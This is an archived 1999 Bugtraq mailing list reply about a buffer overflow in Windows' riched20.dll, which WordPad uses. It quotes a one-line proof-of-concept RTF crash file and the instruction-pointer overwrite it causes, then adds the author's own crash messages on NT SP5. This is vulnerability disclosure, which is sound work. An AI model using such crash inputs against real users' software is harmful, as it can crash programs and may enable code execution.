[12661] in bugtraq
Re: WordPad/riched20.dll buffer overflow
daemon@ATHENA.MIT.EDU (Bronek Kozicki)
Fri Nov 19 18:04:33 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
Message-Id: <000a01bf31fe$d6829700$fac9a8c0@poland.wpi>
Date: Thu, 18 Nov 1999 20:55:18 +0100
Reply-To: Bronek Kozicki <bronek@WPI.COM.PL>
From: Bronek Kozicki <bronek@WPI.COM.PL>
X-To: BugTraq Mailing List <BUGTRAQ@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <19991118094304.1519.qmail@hotmail.com>
> Just if someone needs to know...
>
> Win98/NT4 Riched20.dll (which WordPad uses) has a classic buffer
> overflow problem with ".rtf"-files.
>
> Crashme.rtf :
> {\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
>
> A malicious document may probably abuse this to execute arbitary
> code. WordPad crashes with EIP=41414141.
I got my WordPad crashed with message:
The instruction at "0x61616161" referenced memory at "0x61616161". The
memory could not be "read".
I press "OK" to close application, next message is:
The instruction at "0x5f8012b3" referenced memory at "0x00000004". The
memory could not be "read".
Then I have only "choice" to "terminate the application".
I use Windows NT (international English edtion) + SP5 .
Bronek Kozicki
